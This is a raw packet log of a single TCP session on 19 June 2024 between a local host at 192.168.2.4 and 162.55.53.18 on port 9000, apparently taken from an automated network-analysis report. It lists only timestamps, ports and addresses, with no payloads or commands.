Jun 19, 2024 14:40:17.287923098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.287938118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.287945986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.287961960 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.287981987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.288002968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.288044930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.288045883 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.288063049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.288103104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.288152933 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.288168907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.288208961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289468050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289518118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289524078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289539099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289563894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289592981 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289611101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289625883 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289642096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289661884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289685011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289690018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289705038 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289741039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289783955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289819002 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289843082 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289856911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289906025 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.289931059 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289946079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.289983034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290118933 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290132999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290148020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290167093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290190935 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290240049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290277958 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290395975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290424109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290440083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290453911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290463924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290482044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290505886 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290509939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290524960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290539980 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290548086 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290555954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290560961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290580034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290595055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290663004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290678978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290693045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290704966 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290709019 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290714025 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290735006 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290746927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290783882 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290822983 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290894985 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290910959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290925980 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290939093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290942907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290956020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290957928 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290968895 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290975094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290987968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.290988922 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.290997982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291004896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291018963 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291022062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291045904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291066885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291218042 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291234016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291248083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291273117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291287899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291361094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291376114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291409016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291410923 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291428089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291443110 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291459084 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291465044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291475058 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291480064 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291491032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291503906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291507006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291517019 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291522026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291532993 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291544914 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291559935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291562080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291578054 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.291579962 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291610003 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.291632891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292016983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292032003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292047024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292062044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292063951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292078018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292082071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292089939 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292098999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292104959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292117119 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292129993 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292134047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292145014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292150021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292164087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292165041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292174101 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292182922 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292191029 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292196989 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.292207003 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292218924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.292239904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.326071024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.326088905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.326102972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.326134920 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.326157093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.378781080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.378858089 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.378963947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.378987074 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379002094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379013062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379015923 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379031897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379036903 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379048109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379059076 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379062891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379091978 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379091978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379111052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379117012 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379126072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.379132986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379148960 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.379167080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380125046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380203009 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380214930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380238056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380254030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380256891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380273104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380290985 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380295992 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380340099 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380371094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380386114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380414963 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380426884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380465031 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380477905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380500078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380510092 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380516052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380518913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380533934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380546093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380564928 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380579948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380595922 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380597115 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380631924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380700111 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380712986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380727053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380738974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380743027 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380754948 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380759001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380769968 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380774975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380789995 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380789995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.380810022 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.380835056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381005049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381021023 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381035089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381043911 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381048918 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381058931 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381064892 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381078005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381082058 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381092072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381098032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381117105 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381125927 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381131887 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381145000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381170034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381201982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381380081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381398916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381417036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381422043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381433964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381445885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381449938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381465912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381473064 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381481886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381488085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381498098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381511927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381515026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381536007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381560087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381695032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381711006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381726027 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381730080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381747961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381763935 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381915092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381928921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381943941 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381948948 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381961107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381968975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381977081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381984949 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.381993055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.381998062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382009029 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382014036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382023096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382030010 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382040024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382045984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382056952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382059097 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382072926 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382076979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382090092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382093906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382108927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382126093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382317066 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382332087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382347107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382358074 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382363081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382379055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382391930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382400036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382441998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382457972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382472038 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382479906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382487059 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382496119 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382502079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382510900 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382518053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382527113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382534981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382540941 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382550955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382560015 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382566929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382575035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382584095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382594109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382600069 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.382602930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382625103 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.382632971 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.417098045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.417134047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.417150974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.417160988 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.417188883 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.417201042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472327948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472347975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472363949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472393990 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472404957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472407103 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472420931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472436905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472455025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472464085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472485065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472496033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472512960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472531080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472546101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472548962 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472568989 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472582102 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.472604036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472619057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.472659111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.475063086 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.475097895 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.475111961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.475114107 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.475127935 CEST	49748	9000	192.168.2.4	162.55.53.18
